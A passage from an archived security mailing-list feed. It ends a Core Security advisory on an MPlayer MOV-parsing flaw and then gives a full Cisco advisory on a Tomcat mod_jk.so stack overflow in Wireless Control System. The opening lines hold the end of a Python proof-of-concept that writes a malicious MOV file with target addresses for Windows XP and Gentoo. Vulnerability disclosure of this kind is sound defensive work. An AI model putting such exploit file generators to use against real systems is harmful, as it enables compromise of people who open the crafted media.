&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; struct.pack(&amp;quot;&amp;gt;L&amp;quot;,base+300)+what)
&lt;br&gt;&amp;nbsp; &amp;nbsp; trak = mkatom(&amp;quot;trak&amp;quot;,stsc)
&lt;br&gt;&amp;nbsp; &amp;nbsp; moov = mkatom(&amp;quot;moov&amp;quot;,trak)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; file = ftyp + mdat + moov
&lt;br&gt;&amp;nbsp; &amp;nbsp; return file
&lt;br&gt;&lt;br&gt;try:
&lt;br&gt;&amp;nbsp; &amp;nbsp; if sys.argv[2] != &amp;quot;linux&amp;quot;:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; evilness = poc(0x0122e000, 24) &amp;nbsp; &amp;nbsp; #Windows XP SP2 Prof. ES
&lt;br&gt;&amp;nbsp; &amp;nbsp; else:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; evilness = poc(0x088aa020, 20) &amp;nbsp; &amp;nbsp; #Linux Gentoo
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; print &amp;quot;[+] Generating file: %s&amp;quot; % sys.argv[1]
&lt;br&gt;&amp;nbsp; &amp;nbsp; file = open(sys.argv[1], &amp;quot;wb&amp;quot;)
&lt;br&gt;&amp;nbsp; &amp;nbsp; file.write(evilness)
&lt;br&gt;&amp;nbsp; &amp;nbsp; file.close()
&lt;br&gt;&amp;nbsp; &amp;nbsp; print &amp;quot;[+] Done.&amp;quot;
&lt;br&gt;&lt;br&gt;except Exception, e:
&lt;br&gt;&amp;nbsp; &amp;nbsp; print &amp;quot;[+] Usage: python mplayer_poc.py filename.mov windows (For
&lt;br&gt;WinXP Prof SP2 ES)&amp;quot;
&lt;br&gt;&amp;nbsp; &amp;nbsp; print &amp;quot; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; python mplayer_poc.py filename.mov linux &amp;nbsp; &amp;nbsp; (For
&lt;br&gt;Linux Gentoo)&amp;quot;
&lt;br&gt;&lt;br&gt;- -----------/
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Report Timeline*
&lt;br&gt;&lt;br&gt;. 2008-01-18: Core Security Technologies notifies the MPlayer team of
&lt;br&gt;the vulnerability.
&lt;br&gt;. 2008-01-18: The MPlayer team asks Core Security Technologies for
&lt;br&gt;technical description of the vulnerability.
&lt;br&gt;. 2008-01-22: Technical details sent to MPlayer team by Core Security
&lt;br&gt;Technologies.
&lt;br&gt;. 2008-01-28: MPlayer notifies Core Security Technologies that a fix has
&lt;br&gt;been produced.
&lt;br&gt;. 2008-02-04: CORE-2008-0122 advisory is published.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*References*
&lt;br&gt;&lt;br&gt;[1] &lt;a href=&quot;http://www.mplayerhq.hu&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mplayerhq.hu&lt;/a&gt;&lt;br&gt;[2]
&lt;br&gt;&lt;a href=&quot;http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_mov.c?r1=25920&amp;r2=25922&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_mov.c?r1=25920&amp;r2=25922&lt;/a&gt;&lt;br&gt;[3] &lt;a href=&quot;http://www.mplayerhq.hu/MPlayer/patches/demux_mov_fix_20080129.diff&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mplayerhq.hu/MPlayer/patches/demux_mov_fix_20080129.diff&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;*About CoreLabs*
&lt;br&gt;&lt;br&gt;CoreLabs, the research center of Core Security Technologies, is charged
&lt;br&gt;with anticipating the future needs and requirements for information
&lt;br&gt;security technologies. We conduct our research in several important
&lt;br&gt;areas of computer security including system vulnerabilities, cyber
&lt;br&gt;attack planning and simulation, source code auditing, and cryptography.
&lt;br&gt;Our results include problem formalization, identification of
&lt;br&gt;vulnerabilities, novel solutions and prototypes for new technologies.
&lt;br&gt;CoreLabs regularly publishes security advisories, technical papers,
&lt;br&gt;project information and shared software tools for public use at:
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/corelabs/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs/&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*About Core Security Technologies*
&lt;br&gt;&lt;br&gt;Core Security Technologies develops strategic solutions that help
&lt;br&gt;security-conscious organizations worldwide develop and maintain a
&lt;br&gt;proactive process for securing their networks. The company's flagship
&lt;br&gt;product, CORE IMPACT, is the most comprehensive product for performing
&lt;br&gt;enterprise security assurance testing. CORE IMPACT evaluates network,
&lt;br&gt;endpoint and end-user vulnerabilities and identifies what resources are
&lt;br&gt;exposed. It enables organizations to determine if current security
&lt;br&gt;investments are detecting and preventing attacks. Core Security
&lt;br&gt;Technologies augments its leading technology solution with world-class
&lt;br&gt;security consulting services, including penetration testing and software
&lt;br&gt;security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
&lt;br&gt;Security Technologies can be reached at 617-399-6980 or on the Web at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*Disclaimer*
&lt;br&gt;&lt;br&gt;The contents of this advisory are copyright (c) 2008 Core Security
&lt;br&gt;Technologies and (c) 2008 CoreLabs, and may be distributed freely
&lt;br&gt;provided that no fee is charged for this distribution and proper credit
&lt;br&gt;is given.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*GPG/PGP Keys*
&lt;br&gt;&lt;br&gt;This advisory has been signed with the GPG key of Core Security
&lt;br&gt;Technologies advisories team, which is available for download at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.7 (MingW32)
&lt;br&gt;Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org&lt;/a&gt;&lt;br&gt;&lt;br&gt;iD8DBQFHp2cUyNibggitWa0RAt6mAJ49+DbotNeLAGZsUT+GngtZsKrRJQCeOL0d
&lt;br&gt;cHhAkwi751HR3NJSPFW7CxA=
&lt;br&gt;=sS4h
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/CORE-2008-0122%3A-MPlayer-arbitrary-pointer-dereference-tp15277244p15277244.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15213266</id>
	<title>Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so Vulnerability</title>
	<published>2008-01-30T08:58:45Z</published>
	<updated>2008-01-30T08:58:45Z</updated>
	<author>
		<name>Cisco Systems Product Security Incident Response Team</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&lt;br&gt;Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so
&lt;br&gt;Vulnerability
&lt;br&gt;&lt;br&gt;Advisory ID: cisco-sa-20080130-wcs
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Revision 1.0
&lt;br&gt;&lt;br&gt;For Public Release 2008 January 30 1600 UTC (GMT)
&lt;br&gt;&lt;br&gt;+-----------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Summary
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;Apache Tomcat is the servlet container for JavaServlet and JavaServer
&lt;br&gt;Pages Web within the Cisco Wireless Control System (WCS). A
&lt;br&gt;vulnerability exists in the mod_jk.so URI handler within Apache Tomcat
&lt;br&gt;which, if exploited, may result in a remote code execution attack.
&lt;br&gt;&lt;br&gt;This advisory is posted at 
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Affected Products
&lt;br&gt;=================
&lt;br&gt;&lt;br&gt;This section provides details on affected products.
&lt;br&gt;&lt;br&gt;Vulnerable Products
&lt;br&gt;+------------------
&lt;br&gt;&lt;br&gt;Cisco WCS devices running software 3.x and 4.0.x prior to 4.0.100.0 are
&lt;br&gt;affected by this vulnerability. Cisco WCS devices running software 4.1.x
&lt;br&gt;and 4.2.x prior to to version 4.2.62.0 are also vulnerable.
&lt;br&gt;&lt;br&gt;Note: The version of WCS software installed on a particular device can
&lt;br&gt;be found via the WCS HTTP management interface. Select 
&lt;br&gt;&amp;quot;Help -&amp;gt; About the Software&amp;quot; to obtain the software version.
&lt;br&gt;&lt;br&gt;Products Confirmed Not Vulnerable
&lt;br&gt;+--------------------------------
&lt;br&gt;&lt;br&gt;No other Cisco products are currently known to be affected by this
&lt;br&gt;vulnerability.
&lt;br&gt;&lt;br&gt;Details
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;The Cisco Wireless Control System is a centralized, systems-level
&lt;br&gt;platform for managing and controlling lightweight access points,
&lt;br&gt;wireless LAN controllers, and Wireless Location Appliances for the
&lt;br&gt;Cisco Unified Wireless Network. The Cisco Wireless Control System uses
&lt;br&gt;Apache Tomcat. A vulnerability in Apache Tomcat may allow for remote
&lt;br&gt;code execution attacks. The mod_jk.so URI handler does not handle long
&lt;br&gt;URLs correctly. An insecure memory copy triggers an exploitable stack
&lt;br&gt;overflow. This vulnerability is documented in CVE-2007-0774 and in Cisco
&lt;br&gt;bug ID CSCsk18191.
&lt;br&gt;&lt;br&gt;Vulnerability Scoring Details
&lt;br&gt;+----------------------------
&lt;br&gt;&lt;br&gt;Cisco has provided scores for the vulnerability in this advisory based
&lt;br&gt;on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
&lt;br&gt;this Security Advisory is done in accordance with CVSS version 2.0.
&lt;br&gt;&lt;br&gt;CVSS is a standards-based scoring method that conveys vulnerability
&lt;br&gt;severity and helps determine urgency and priority of response.
&lt;br&gt;&lt;br&gt;Cisco has provided a base and temporal score. Customers can then
&lt;br&gt;compute environmental scores to assist in determining the impact of the
&lt;br&gt;vulnerability in individual networks.
&lt;br&gt;&lt;br&gt;Cisco has provided an FAQ to answer additional questions regarding CVSS
&lt;br&gt;at
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Cisco has also provided a CVSS calculator to help compute the
&lt;br&gt;environmental impact for individual networks at
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://intellishield.cisco.com/security/alertmanager/cvss&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://intellishield.cisco.com/security/alertmanager/cvss&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;CSCsk18191 - WCS mod_jk.so Apache Tomcat vulnerability 
&lt;br&gt;&lt;br&gt;CVSS Base Score - 10.0
&lt;br&gt;&amp;nbsp; &amp;nbsp; Access Vector - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Network 
&lt;br&gt;&amp;nbsp; &amp;nbsp; Access Complexity - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Low
&lt;br&gt;&amp;nbsp; &amp;nbsp; Authentication - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; None 
&lt;br&gt;&amp;nbsp; &amp;nbsp; Confidentiality Impact - &amp;nbsp; Complete
&lt;br&gt;&amp;nbsp; &amp;nbsp; Integrity Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Complete
&lt;br&gt;&amp;nbsp; &amp;nbsp; Availability Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp;Complete
&lt;br&gt;&lt;br&gt;CVSS Temporal Score - 8.3
&lt;br&gt;&amp;nbsp; &amp;nbsp; Exploitability - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Functional
&lt;br&gt;&amp;nbsp; &amp;nbsp; Remediation Level - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Official-Fix 
&lt;br&gt;&amp;nbsp; &amp;nbsp; Report Confidence - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Confirmed
&lt;br&gt;&lt;br&gt;&lt;br&gt;Impact
&lt;br&gt;======
&lt;br&gt;&lt;br&gt;Successful exploitation of the vulnerability may result in remote code
&lt;br&gt;execution.
&lt;br&gt;&lt;br&gt;Software Versions and Fixes
&lt;br&gt;===========================
&lt;br&gt;&lt;br&gt;Each row of the following software table (below) describes a release
&lt;br&gt;train and the platforms or products for which it is intended. If a
&lt;br&gt;given release train is vulnerable, then the earliest possible releases
&lt;br&gt;that contain the fix are shown in the &amp;quot;First Fixed Release&amp;quot; column. A
&lt;br&gt;device running a release in the given train that is earlier than the
&lt;br&gt;release in a specific column (less than the First Fixed Release) is
&lt;br&gt;known to be vulnerable. The release should be upgraded at least to the
&lt;br&gt;indicated release or a later version (greater than or equal to the
&lt;br&gt;First Fixed Release label).
&lt;br&gt;&lt;br&gt;+-------------------------------------------------------------+
&lt;br&gt;| Affected Releases &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | First Fixed &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | Releases &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;|-----------------------------------------+-------------------|
&lt;br&gt;| WCS for Linux and Windows 4.0.x and &amp;nbsp; &amp;nbsp; | 4.0.100.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;| earlier &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;|-----------------------------------------+-------------------|
&lt;br&gt;| WCS for Linux and Windows 4.1.91.0 and &amp;nbsp;| 4.2.62.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;| earlier &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;+-------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;When considering software upgrades, also consult
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/go/psirt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/go/psirt&lt;/a&gt;&amp;nbsp;and any subsequent advisories to determine
&lt;br&gt;exposure and a complete upgrade solution.
&lt;br&gt;&lt;br&gt;In all cases, customers should exercise caution to be certain the
&lt;br&gt;devices to be upgraded contain sufficient memory, and that current
&lt;br&gt;hardware and software configurations will continue to be supported
&lt;br&gt;properly by the new release. If the information is not clear, contact
&lt;br&gt;the Cisco Technical Assistance Center (TAC) or your contracted
&lt;br&gt;maintenance provider for assistance.
&lt;br&gt;&lt;br&gt;Workarounds
&lt;br&gt;===========
&lt;br&gt;&lt;br&gt;The following workarounds can be implemented.
&lt;br&gt;&lt;br&gt;Transit ACLs (tACL)
&lt;br&gt;+------------------
&lt;br&gt;&lt;br&gt;Filters that deny HTTPS packets using TCP port 443 should be deployed
&lt;br&gt;throughout the network as part of a tACL policy for protection of
&lt;br&gt;traffic which enters the network at ingress access points. This policy
&lt;br&gt;should be configured to protect the network device where the filter is
&lt;br&gt;applied and other devices behind it. Filters for HTTPS packets using
&lt;br&gt;TCP port 443 should also be deployed in front of vulnerable network
&lt;br&gt;devices so that traffic is only allowed from trusted clients.
&lt;br&gt;&lt;br&gt;Additional information about tACLs is available in &amp;quot;Transit Access
&lt;br&gt;Control Lists: Filtering at Your Edge&amp;quot;:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Additional Mitigation Techniques
&lt;br&gt;+-------------------------------
&lt;br&gt;&lt;br&gt;Additional mitigation techniques that can be deployed on Cisco devices
&lt;br&gt;within the network are available in the Cisco Applied Intelligence
&lt;br&gt;companion document for this advisory:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-amb-20080130-wcs.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-amb-20080130-wcs.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Obtaining Fixed Software
&lt;br&gt;========================
&lt;br&gt;&lt;br&gt;Cisco has released free software updates that address this
&lt;br&gt;vulnerability. Prior to deploying software, customers should consult
&lt;br&gt;their maintenance provider or check the software for feature set
&lt;br&gt;compatibility and known issues specific to their environment.
&lt;br&gt;&lt;br&gt;Customers may only install and expect support for the feature
&lt;br&gt;sets they have purchased. By installing, downloading, accessing
&lt;br&gt;or otherwise using such software upgrades, customers agree to be
&lt;br&gt;bound by the terms of Cisco's software license terms found at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html&lt;/a&gt;, 
&lt;br&gt;or as otherwise set forth at Cisco.com Downloads at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Do not contact &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;psirt@...&lt;/a&gt; or &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt; for software
&lt;br&gt;upgrades.
&lt;br&gt;&lt;br&gt;Customers with Service Contracts
&lt;br&gt;+-------------------------------
&lt;br&gt;&lt;br&gt;Customers with contracts should obtain upgraded software through their
&lt;br&gt;regular update channels. For most customers, this means that upgrades
&lt;br&gt;should be obtained through the Software Center on Cisco's worldwide
&lt;br&gt;website at &lt;a href=&quot;http://www.cisco.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Customers using Third Party Support Organizations
&lt;br&gt;+------------------------------------------------
&lt;br&gt;&lt;br&gt;Customers whose Cisco products are provided or maintained through prior
&lt;br&gt;or existing agreements with third-party support organizations, such as
&lt;br&gt;Cisco Partners, authorized resellers, or service providers should
&lt;br&gt;contact that support organization for guidance and assistance with the
&lt;br&gt;appropriate course of action in regards to this advisory.
&lt;br&gt;&lt;br&gt;The effectiveness of any workaround or fix is dependent on specific
&lt;br&gt;customer situations, such as product mix, network topology, traffic
&lt;br&gt;behavior, and organizational mission. Due to the variety of affected
&lt;br&gt;products and releases, customers should consult with their service
&lt;br&gt;provider or support organization to ensure any applied workaround or
&lt;br&gt;fix is the most appropriate for use in the intended network before it
&lt;br&gt;is deployed.
&lt;br&gt;&lt;br&gt;Customers without Service Contracts
&lt;br&gt;+----------------------------------
&lt;br&gt;&lt;br&gt;Customers who purchase direct from Cisco but do not hold a Cisco
&lt;br&gt;service contract, and customers who purchase through third-party
&lt;br&gt;vendors but are unsuccessful in obtaining fixed software through their
&lt;br&gt;point of sale should acquire upgrades by contacting the Cisco Technical
&lt;br&gt;Assistance Center (TAC). TAC contacts are as follows:
&lt;br&gt;&lt;br&gt;&amp;nbsp; * +1 800 553 2447 (toll free from within North America)
&lt;br&gt;&amp;nbsp; * +1 408 526 7209 (toll call from anywhere in the world)
&lt;br&gt;&amp;nbsp; * e-mail: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;tac@...&lt;/a&gt;
&lt;br&gt;&lt;br&gt;Customers should have their product serial number available and be
&lt;br&gt;prepared to give the URL of this notice as evidence of entitlement to a
&lt;br&gt;free upgrade. Free upgrades for non-contract customers must be
&lt;br&gt;requested through the TAC.
&lt;br&gt;&lt;br&gt;Refer to &lt;a href=&quot;http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml&lt;/a&gt;&lt;br&gt;for additional TAC contact information, including localized telephone
&lt;br&gt;numbers, and instructions and e-mail addresses for use in various
&lt;br&gt;languages.
&lt;br&gt;&lt;br&gt;Exploitation and Public Announcements
&lt;br&gt;=====================================
&lt;br&gt;&lt;br&gt;The Cisco PSIRT is aware of the availability of proof-of-concept
&lt;br&gt;exploits.
&lt;br&gt;&lt;br&gt;Status of this Notice: FINAL
&lt;br&gt;============================
&lt;br&gt;&lt;br&gt;THIS DOCUMENT IS PROVIDED ON AN &amp;quot;AS IS&amp;quot; BASIS AND DOES NOT IMPLY ANY
&lt;br&gt;KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
&lt;br&gt;MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
&lt;br&gt;INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT
&lt;br&gt;YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
&lt;br&gt;DOCUMENT AT ANY TIME.
&lt;br&gt;&lt;br&gt;A stand-alone copy or Paraphrase of the text of this document that
&lt;br&gt;omits the distribution URL in the following section is an uncontrolled
&lt;br&gt;copy, and may lack important information or contain factual errors.
&lt;br&gt;&lt;br&gt;Distribution
&lt;br&gt;============
&lt;br&gt;&lt;br&gt;This advisory is posted on Cisco's worldwide website at:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;In addition to worldwide web posting, a text version of this notice is
&lt;br&gt;clear-signed with the Cisco PSIRT PGP key and is posted to the
&lt;br&gt;following e-mail and Usenet news recipients.
&lt;br&gt;&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=3&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cust-security-announce@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=4&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;first-teams@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=5&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;bugtraq@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=6&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;vulnwatch@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=7&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=8&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco-nsp@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=9&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;full-disclosure@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15213266&amp;i=10&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;comp.dcom.sys.cisco@...&lt;/a&gt;
&lt;br&gt;&lt;br&gt;Future updates of this advisory, if any, will be placed on Cisco's
&lt;br&gt;worldwide website, but may or may not be actively announced on mailing
&lt;br&gt;lists or newsgroups. Users concerned about this problem are encouraged
&lt;br&gt;to check the above URL for any updates.
&lt;br&gt;&lt;br&gt;Revision History
&lt;br&gt;================
&lt;br&gt;&lt;br&gt;+-------------------------------------------------------------+
&lt;br&gt;| Revision 1.0 &amp;nbsp;| 2008-January-30 &amp;nbsp;| Initial public release. &amp;nbsp;|
&lt;br&gt;+-------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;Cisco Security Procedures
&lt;br&gt;=========================
&lt;br&gt;&lt;br&gt;Complete information on reporting security vulnerabilities
&lt;br&gt;in Cisco products, obtaining assistance with security
&lt;br&gt;incidents, and registering to receive security information
&lt;br&gt;from Cisco, is available on Cisco's worldwide website at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&lt;/a&gt;.
&lt;br&gt;This includes instructions for press inquiries regarding
&lt;br&gt;Cisco security notices. All Cisco security advisories are available at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/go/psirt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/go/psirt&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;+-----------------------------------------------------------------------
&lt;br&gt;All contents are Copyright 2006-2007 Cisco Systems, Inc. All rights
&lt;br&gt;reserved. 
&lt;br&gt;+-----------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Updated: Jan 29, 2008 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Document ID: 100361
&lt;br&gt;&lt;br&gt;+-----------------------------------------------------------------------
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.7 (FreeBSD)
&lt;br&gt;&lt;br&gt;iD8DBQFHoKf686n/Gc8U/uARAm9sAKCHo6l9iJ87Y3H/UZd96HibLCMPAACfXvk9
&lt;br&gt;q2P9vDmfgI45MPGr4GRgaY0=
&lt;br&gt;=Dkxv
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
